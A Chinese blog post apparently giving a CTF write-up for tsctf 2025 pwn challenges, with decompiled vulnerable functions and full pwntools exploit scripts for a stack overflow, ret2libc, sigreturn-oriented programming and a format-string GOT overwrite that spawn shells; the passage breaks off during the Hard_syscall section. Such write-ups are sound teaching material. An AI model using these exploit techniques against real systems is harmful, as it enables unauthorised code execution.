<!doctype html>
<html lang="zh-CN">
  <head>
    
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="theme-color" content="#6d5dfc">
<title>tsctf 2025 · Auceptin&#39;s Blog</title>
<meta name="description" content="Auceptin 的个人博客">
<link rel="canonical" href="https://aucept.in/2025/10/12/tsctf-2025/">
<link rel="icon" type="image/png" href="/icon.png">
<link rel="apple-touch-icon" href="/icon.png">
<link rel="alternate" type="application/atom+xml" title="Auceptin&#39;s Blog" href="/atom.xml">
<meta property="og:type" content="article">
<meta property="og:title" content="tsctf 2025 · Auceptin&#39;s Blog">
<meta property="og:description" content="Auceptin 的个人博客">
<meta property="og:url" content="https://aucept.in/2025/10/12/tsctf-2025/">
<meta property="og:image" content="https://aucept.in/image/cover34_castle.jpg">
<script>
  (function () {
    try {
      var saved = localStorage.getItem('shileyuan-color-scheme') || localStorage.getItem('aurora-color-scheme');
      if (saved) localStorage.setItem('shileyuan-color-scheme', saved);
      var dark = saved ? saved === 'dark' : window.matchMedia('(prefers-color-scheme: dark)').matches;
      document.documentElement.dataset.theme = dark ? 'dark' : 'light';

    } catch (error) {}
  })();
</script>
<style>:root { --accent: #6d5dfc; }</style>
<link rel="stylesheet" href="/css/style.css">
<style id="shileyuan-mutable-css">
  body { --scene: 1; }
  body.is-home { --accent: #6d5dfc; }
  .hero-copy h1 em, .home-hero .eyebrow { color: var(--accent); }
  .home-hero .button.primary { background: var(--accent); }
  .hero-copy h1 { letter-spacing: -0.055em; }
  .post-card { border-radius: 22px; }
  .post-grid { gap: 24px; }
  .site-header, .live-css-token { backdrop-filter: blur(22px); }
  .avatar-wrap { rotate: 3deg; }
  .avatar-wrap img { filter: saturate(1.08); }
  .orbit { border-style: dashed; }
</style>

  <meta name="generator" content="Hexo 7.3.0"></head>
  <body class="is-post">
    <div class="reading-progress" aria-hidden="true"><span id="reading-progress-bar"></span></div>
    <header class="site-header" id="site-header">
  <div class="header-inner">
    <a class="brand" href="/" aria-label="Auceptin&#39;s Blog 首页">
      <span class="brand-mark"><img src="/icon.png" alt=""></span>
      <span class="brand-text">Auceptin&#39;s Blog</span>
    </a>

    <button class="nav-toggle" id="nav-toggle" type="button" aria-expanded="false" aria-controls="site-nav">
      <span></span><span></span><span></span><span class="sr-only">打开导航</span>
    </button>

    <nav class="site-nav" id="site-nav" aria-label="主导航">
      
        
        <a class="nav-link " href="/">首页</a>
      
        
        <a class="nav-link " href="/archives/">归档</a>
      
        
        <a class="nav-link " href="/categories/">分类</a>
      
        
        <a class="nav-link " href="/tags/">标签</a>
      
        
        <a class="nav-link " href="/friends/">友链</a>
      
      <button class="theme-toggle" id="theme-toggle" type="button" aria-label="切换深色模式">
        <span class="theme-icon-light">☀</span><span class="theme-icon-dark">☾</span>
      </button>
    </nav>
  </div>
</header>


    <main class="site-main">
      
<article class="article-shell">
  <header class="article-hero has-cover" style="--cover-image: url('/image/cover2_square.png')">
    <div class="article-hero-overlay"></div>
    <div class="article-hero-inner">
      <h1>tsctf 2025</h1>
      <div class="post-meta light-meta article-hero-meta">
        <span>发表于<time datetime="2025-10-12T15:28:17.000Z">2025-10-12</time></span>
        <span aria-hidden="true">|</span>
        <span>更新于<time datetime="2026-07-17T07:53:25.449Z">2026-07-17</time></span>
        <span aria-hidden="true">|</span><a href="/categories/ctf/">ctf</a>
      </div>
    </div>
  </header>

  <div class="article-layout">
    <div class="article-container">
      <div class="article-content" id="article-content"><h2 id="ret">ret</h2>
<p>签到题，明摆着的栈溢出和后门函数，略</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span>
context<span class="token punctuation">.</span>terminal <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'tmux'</span><span class="token punctuation">,</span> <span class="token string">'splitw'</span><span class="token punctuation">,</span> <span class="token string">'-h'</span><span class="token punctuation">]</span>

ret_addr <span class="token operator">=</span> <span class="token number">0x400501</span>
backdoor <span class="token operator">=</span> <span class="token number">0x0400676</span>
io <span class="token operator">=</span> connect<span class="token punctuation">(</span><span class="token string">"host.docker.internal"</span><span class="token punctuation">,</span> <span class="token number">64958</span><span class="token punctuation">)</span>

io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"sign-in!"</span><span class="token punctuation">)</span>
payload <span class="token operator">=</span> <span class="token string">b"A"</span><span class="token operator">*</span><span class="token punctuation">(</span><span class="token number">16</span> <span class="token operator">+</span> <span class="token number">8</span><span class="token punctuation">)</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>ret_addr<span class="token punctuation">)</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>backdoor<span class="token punctuation">)</span>
io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="pop">pop</h2>
<p>提示了ret2libc</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c">__int64 <span class="token function">vuln</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  _BYTE v1<span class="token punctuation">[</span><span class="token number">16</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [rsp+0h] [rbp-10h] BYREF</span>

  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"No backdoors this time!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token function">gets</span><span class="token punctuation">(</span>v1<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>只给了一个任意读，第一步是泄露libc基地址，利用got表泄露，gadget都很全，然后回到vuln函数再利用一次</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span>
context<span class="token punctuation">.</span>terminal <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'tmux'</span><span class="token punctuation">,</span> <span class="token string">'splitw'</span><span class="token punctuation">,</span> <span class="token string">'-h'</span><span class="token punctuation">]</span>

pop_rdi_ret <span class="token operator">=</span> <span class="token number">0x400713</span>
ret_addr <span class="token operator">=</span> <span class="token number">0x4004c9</span>
elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./pwn'</span><span class="token punctuation">)</span>
libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./libc-2.23.so'</span><span class="token punctuation">)</span>

<span class="token comment">#io = process('./pwn')</span>
io <span class="token operator">=</span> connect<span class="token punctuation">(</span><span class="token string">"host.docker.internal"</span><span class="token punctuation">,</span><span class="token number">32821</span><span class="token punctuation">)</span>
<span class="token comment"># 第一阶段：泄露puts地址</span>
puts_got <span class="token operator">=</span> elf<span class="token punctuation">.</span>got<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span>
puts_plt <span class="token operator">=</span> elf<span class="token punctuation">.</span>plt<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span> 
vuln_addr <span class="token operator">=</span> <span class="token number">0x400626</span>

payload1 <span class="token operator">=</span> <span class="token string">b"A"</span> <span class="token operator">*</span> <span class="token number">24</span>
payload1 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span>
payload1 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>puts_got<span class="token punctuation">)</span>
payload1 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>puts_plt<span class="token punctuation">)</span>
payload1 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>vuln_addr<span class="token punctuation">)</span>
io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"time!"</span><span class="token punctuation">)</span>

io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload1<span class="token punctuation">)</span>
io<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">6</span><span class="token punctuation">)</span>
<span class="token comment"># 接收泄露的地址</span>
puts_leak <span class="token operator">=</span> u64<span class="token punctuation">(</span>io<span class="token punctuation">.</span>recvline<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">b'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
libc_base <span class="token operator">=</span> puts_leak <span class="token operator">-</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span>
system_addr <span class="token operator">=</span> libc_base <span class="token operator">+</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span>
binsh_addr <span class="token operator">=</span> libc_base <span class="token operator">+</span> <span class="token builtin">next</span><span class="token punctuation">(</span>libc<span class="token punctuation">.</span>search<span class="token punctuation">(</span><span class="token string">b'/bin/sh'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

log<span class="token punctuation">.</span>info<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"puts leak: 0x</span><span class="token interpolation"><span class="token punctuation">&#123;</span>puts_leak<span class="token punctuation">:</span><span class="token format-spec">x</span><span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span>
log<span class="token punctuation">.</span>info<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"libc base: 0x</span><span class="token interpolation"><span class="token punctuation">&#123;</span>libc_base<span class="token punctuation">:</span><span class="token format-spec">x</span><span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span>
log<span class="token punctuation">.</span>info<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"system: 0x</span><span class="token interpolation"><span class="token punctuation">&#123;</span>system_addr<span class="token punctuation">:</span><span class="token format-spec">x</span><span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span>
log<span class="token punctuation">.</span>info<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"/bin/sh: 0x</span><span class="token interpolation"><span class="token punctuation">&#123;</span>binsh_addr<span class="token punctuation">:</span><span class="token format-spec">x</span><span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span>

<span class="token comment"># 第二阶段：获取shell</span>
payload2 <span class="token operator">=</span> <span class="token string">b"A"</span> <span class="token operator">*</span> <span class="token number">24</span>
payload2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span>
payload2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>binsh_addr<span class="token punctuation">)</span>
payload2 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>system_addr<span class="token punctuation">)</span>
<span class="token comment">#gdb.attach(io)</span>
io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload2<span class="token punctuation">)</span>

io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="Easy-syscall">Easy-syscall</h2>
<p>有一个magic函数</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c">__int64 <span class="token function">magic</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  __int64 result<span class="token punctuation">;</span> <span class="token comment">// rax</span>

  result <span class="token operator">=</span> <span class="token number">15</span><span class="token punctuation">;</span>
  __asm <span class="token punctuation">&#123;</span> syscall<span class="token punctuation">;</span> LINUX <span class="token operator">-</span> sys_rt_sigreturn <span class="token punctuation">&#125;</span>
  <span class="token keyword">return</span> result<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>进行了一个陌生的系统调用，其作用很强大，根据栈上数据重新设置所有寄存器的值，pwntools里有<code>SigreturnFrame()</code>函数来辅助构建payload</p>
<p>既然可以随意修改寄存器的值了，还有栈溢出可以ROP，那就把rax设置成59，再跳到call system即可</p>
<pre class="line-numbers language-none"><code class="language-none">from pwn import *
context(arch&#x3D;&#39;amd64&#39;, os&#x3D;&#39;linux&#39;, log_level&#x3D;&#39;debug&#39;)
context.terminal &#x3D; [&#39;tmux&#39;, &#39;splitw&#39;, &#39;-h&#39;]

#io &#x3D; process(&#39;.&#x2F;pwn&#39;)
io &#x3D; connect(&quot;host.docker.internal&quot;,36493)

io.recvuntil(b&quot;here...&quot;)
magic_addr &#x3D; 0x40117E
binsh &#x3D; 0x0402008
ret_addr &#x3D; 0x40101a
syscall_addr &#x3D; 0x401185
bss_addr &#x3D; 0x404060

frame &#x3D; SigreturnFrame() 
frame.rax &#x3D; 59
frame.rdi &#x3D; 0x402008
frame.rsi &#x3D; 0
frame.rdx &#x3D; 0
frame.rip &#x3D; 0x401185


frame_bytes &#x3D; bytes(frame)

payload &#x3D; b&quot;A&quot;*48 + b&quot;B&quot;*8
payload +&#x3D; p64(magic_addr)
payload +&#x3D; bytes(frame)


#gdb.attach(io)
io.send(payload)

io.interactive()<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>解这道题的时候一开始手欠在ROP链的开始放了一个ret的gadget，导致sigreturn的时候寄存器全都错位了且其中一个怎么都设置不对正确的值，一度以为pwntools不靠谱了</p>
<h2 id="sentences">sentences</h2>
<p>一如既往地打开IDA</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">unsigned</span> __int64 <span class="token function">vuln</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token keyword">int</span> i<span class="token punctuation">;</span> <span class="token comment">// [rsp+Ch] [rbp-114h]</span>
  <span class="token keyword">char</span> buf<span class="token punctuation">[</span><span class="token number">264</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [rsp+10h] [rbp-110h] BYREF</span>
  <span class="token keyword">unsigned</span> __int64 v3<span class="token punctuation">;</span> <span class="token comment">// [rsp+118h] [rbp-8h]</span>

  v3 <span class="token operator">=</span> <span class="token function">__readfsqword</span><span class="token punctuation">(</span><span class="token number">0x28u</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"Do you have anything you'd like to say to the problem setter?"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"You can only say three sentences."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">for</span> <span class="token punctuation">(</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator">&lt;=</span> <span class="token number">2</span><span class="token punctuation">;</span> <span class="token operator">++</span>i <span class="token punctuation">)</span>
  <span class="token punctuation">&#123;</span>
    <span class="token function">read</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> buf<span class="token punctuation">,</span> <span class="token number">0x100u</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span>buf<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span>
  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"Alright, I haven't received anything now."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"And I won't give you a reply in the future either."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> v3 <span class="token operator">-</span> <span class="token function">__readfsqword</span><span class="token punctuation">(</span><span class="token number">0x28u</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>很明显的格式化字符串漏洞，思路也很明确，先泄露栈地址、libc上函数地址，再利用栈地址找偏移，篡改循环变量i的值为负数，再篡改printf的got表项使其指向system，最后传一个<code>/bin/sh\x00</code>给printf</p>
<p>system和printf的libc地址后三字节不同，选择在一次printf里分两次篡改，幸好read的长度足够，没有卡这点，可以放心的拆分。循环里两次read之间没有输出提示，需要sleep一下调控</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span>
context<span class="token punctuation">.</span>terminal <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'tmux'</span><span class="token punctuation">,</span> <span class="token string">'splitw'</span><span class="token punctuation">,</span> <span class="token string">'-h'</span><span class="token punctuation">]</span>

libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./libc.so.6'</span><span class="token punctuation">)</span>
system_offset <span class="token operator">=</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span>
binsh <span class="token operator">=</span> <span class="token builtin">next</span><span class="token punctuation">(</span>libc<span class="token punctuation">.</span>search<span class="token punctuation">(</span><span class="token string">b'/bin/sh'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
target_addr <span class="token operator">=</span> <span class="token number">0x401274</span>


<span class="token comment">#io = process('./pwn')</span>
io <span class="token operator">=</span> connect<span class="token punctuation">(</span><span class="token string">"host.docker.internal"</span><span class="token punctuation">,</span> <span class="token number">52701</span><span class="token punctuation">)</span>
io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'sentences.'</span><span class="token punctuation">)</span>
io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b'%p%p%p%43$p'</span><span class="token punctuation">)</span>
io<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
output <span class="token operator">=</span> io<span class="token punctuation">.</span>recvline<span class="token punctuation">(</span><span class="token punctuation">)</span>
leaked_stack <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>output<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">b'0x'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">b'?'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span>
leak_libc <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>output<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">b'0x'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">3</span><span class="token punctuation">]</span><span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">b'?'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span>
ret_addr <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>output<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">b'0x'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">b'?'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span>

main_addr <span class="token operator">=</span> ret_addr <span class="token operator">-</span> <span class="token number">78</span>
pm_base <span class="token operator">=</span> main_addr <span class="token operator">-</span> <span class="token number">0x1288</span>
printf_got <span class="token operator">=</span> pm_base <span class="token operator">+</span> <span class="token number">0x4028</span>
i_addr <span class="token operator">=</span> leaked_stack <span class="token operator">-</span> <span class="token number">0xf0</span> <span class="token operator">+</span> <span class="token number">0xef</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"leaked_stack: "</span><span class="token punctuation">,</span><span class="token builtin">hex</span><span class="token punctuation">(</span>leaked_stack<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"i_addr: "</span><span class="token punctuation">,</span><span class="token builtin">hex</span><span class="token punctuation">(</span>i_addr<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"leak_libc: "</span><span class="token punctuation">,</span><span class="token builtin">hex</span><span class="token punctuation">(</span>leak_libc<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"print_got"</span><span class="token punctuation">,</span><span class="token builtin">hex</span><span class="token punctuation">(</span>printf_got<span class="token punctuation">)</span><span class="token punctuation">)</span>
libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./libc.so.6'</span><span class="token punctuation">)</span>
read_addr <span class="token operator">=</span> leak_libc <span class="token operator">-</span> <span class="token number">18</span>
system_offset <span class="token operator">=</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span>
read_offset <span class="token operator">=</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'read'</span><span class="token punctuation">]</span>
lib_base <span class="token operator">=</span> read_addr <span class="token operator">-</span> read_offset
system_addr <span class="token operator">=</span> lib_base <span class="token operator">+</span> system_offset
binsh_addr <span class="token operator">=</span> lib_base <span class="token operator">+</span> binsh
pop_rdi_ret <span class="token operator">=</span> lib_base <span class="token operator">+</span> <span class="token number">0x000000000002a3e5</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"rdi:"</span><span class="token punctuation">,</span><span class="token builtin">hex</span><span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span><span class="token punctuation">)</span>
payload <span class="token operator">=</span> <span class="token string">b''</span>
payload <span class="token operator">+=</span> <span class="token string">b"%200c%10$hhnxxxx"</span>
payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>i_addr<span class="token punctuation">)</span>
<span class="token comment">#payload = b"%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p"</span>

time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">)</span>
io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">write_system_faster</span><span class="token punctuation">(</span>printf_got<span class="token punctuation">,</span> system_addr<span class="token punctuation">)</span><span class="token punctuation">:</span>
    printf_got2 <span class="token operator">=</span> printf_got <span class="token operator">+</span> <span class="token number">2</span>
    <span class="token comment"># 写入低 2 字节</span>
    low_2_bytes <span class="token operator">=</span> system_addr <span class="token operator">&amp;</span> <span class="token number">0xffff</span>
    low_3_bytes <span class="token operator">=</span> <span class="token punctuation">(</span>system_addr <span class="token operator">>></span> <span class="token number">16</span><span class="token punctuation">)</span> <span class="token operator">&amp;</span> <span class="token number">0xff</span>  
    a <span class="token operator">=</span> low_2_bytes <span class="token operator">&amp;</span> <span class="token number">0xff</span>
    adjusted_high_byte <span class="token operator">=</span> low_3_bytes <span class="token operator">+</span> <span class="token number">0x100</span> <span class="token operator">-</span> a  <span class="token comment"># 处理回绕</span>

    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"low_3_bytes: "</span><span class="token punctuation">,</span>low_3_bytes<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"system"</span><span class="token punctuation">,</span><span class="token builtin">hex</span><span class="token punctuation">(</span>system_addr<span class="token punctuation">)</span><span class="token punctuation">)</span>
    payload <span class="token operator">=</span> <span class="token string-interpolation"><span class="token string">f"%</span><span class="token interpolation"><span class="token punctuation">&#123;</span>low_2_bytes<span class="token punctuation">&#125;</span></span><span class="token string">c%12$hn"</span></span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string-interpolation"><span class="token string">f"%</span><span class="token interpolation"><span class="token punctuation">&#123;</span>adjusted_high_byte<span class="token punctuation">&#125;</span></span><span class="token string">c%13$hhn"</span></span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">b"A"</span> <span class="token operator">*</span> <span class="token number">7</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>printf_got<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>printf_got2<span class="token punctuation">)</span>
    time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
    

write_system_faster<span class="token punctuation">(</span>printf_got<span class="token punctuation">,</span> system_addr<span class="token punctuation">)</span>


<span class="token comment">#payload = b"%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p"</span>

time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">)</span>
<span class="token comment">#gdb.attach(io)</span>
io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"/bin/sh\x00"</span><span class="token punctuation">)</span>

io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="Hard-syscall">Hard_syscall</h2>
<p>IDA打开之后震惊了，一个极简的程序，出题人是纯汇编写的吗？</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c">__int64 <span class="token function">vuln</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  _BYTE v1<span class="token punctuation">[</span><span class="token number">16</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [rsp+0h] [rbp-10h] BYREF</span>

  <span class="token function">write</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span> Nothing<span class="token punctuation">,</span> <span class="token number">27</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token function">read</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> v1<span class="token punctuation">,</span> <span class="token number">512</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>给了一个充足的栈溢出，但是除此之外啥也没有，经过上一个ret2syscall的暗示，知道又要利用sigreturn了</p>
<p>第一个难点在于虽然可以自由地ROP，自由地跳转到syscall，但是没有正确设置rax的手段……并非，rax是函数的返回值存放的地方，而read函数返回值为读入的字节数，只需要触发一个read，输入15个字节，再跳到syscall就实现了！</p>
<p>接下来的思路依然是用sigreturn执行execve(“/bin/sh\x00”)，这里binsh需要自己写入，正好接着读15字节的机会，再取data段找一个可写的地址塞进去，统统放进SigreturnFrame里</p>
